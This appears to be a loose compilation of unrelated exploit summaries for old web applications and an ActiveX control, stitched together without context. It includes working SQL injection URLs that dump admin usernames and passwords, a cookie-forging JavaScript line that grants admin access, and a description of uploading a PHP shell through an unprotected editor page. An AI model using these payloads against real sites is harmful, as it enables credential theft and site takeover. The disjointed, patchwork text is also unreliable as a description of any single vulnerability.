index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers
A vulnerability exists in the FlashAX ActiveX control (FlashAX.ocx) version 1.0.0.7, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an unsafe implementation of the "Run()" method, which can be exploited to execute arbitrary programs.
An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL queries in the vulnerable parameter and execute arbitrary SQL commands in the back-end database. This can be used to bypass authentication, access, modify and delete data from the back-end database.
This exploit allows an attacker to bypass the safe_mode restriction in PHP by using the python extension. The exploit uses the python_eval() function to execute arbitrary python code, which can be used to execute system commands.
Almost every GET parameter is vulnerable to SQL Injection. There are two possible tables which contain user data, depending on the CMS version. The Columns for username and password are: username and userpassword. The exploit can be triggered by sending a malicious request to the target URL with the following payloads: http://xxx/index.php?id=1+union+select+1,2,3,4,5,concat(username,0x3a,userpassword),7,8,9+from+rcmsv2_user/*, http://xxx/referenzdetail.php?id=-6+union+select+1,2,3,4,5,6,concat(username,0x3a,userpassword),8,9,10,11+from+rcms_user/*, http://xxx/produkte.php?id=-2+union+select+1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11+from+rcmsv2_user/*
A vulnerability in Shopsysteme (new version oscommerce) allows an attacker to upload a malicious file, such as a PHP shell, to the web server. This is done by accessing the /admin/editor/images.php page and uploading the malicious file. The malicious file is then accessible at http://www.example.com/images/upload/mNt.php. This vulnerability affects versions of Shopsysteme prior to the 2008-12-17 patch.
BP Blog versions 6.0, 7.0, 8.0, and 9.0 are vulnerable to a database disclosure vulnerability. An attacker can access the database by sending a request to the vulnerable URL, which is in the form of www.site.com/{path}/Blog.mdb. The vulnerable versions are V6.0, V7.0, V8.0, and V9.0.
If the password "$code" typed is the same of $admin_pass, so you log in, cookie is set with the name "verified" and with content "null". So, a malicious user can just set up a cookie with that name and value, and then he will be logged as the admin. Exploit: javascript:document.cookie = "verified=null; path=/";
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'authorID' parameter to '/authors.asp' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information.
Zelta E Store is prone to multiple remote vulnerabilities, including remote file upload, authentication bypass, R-SQL and B-SQL injection. An attacker can exploit these issues to upload arbitrary files to the affected computer, bypass authentication, execute arbitrary SQL commands, and gain access to sensitive information. This may lead to further attacks.
Services By CQR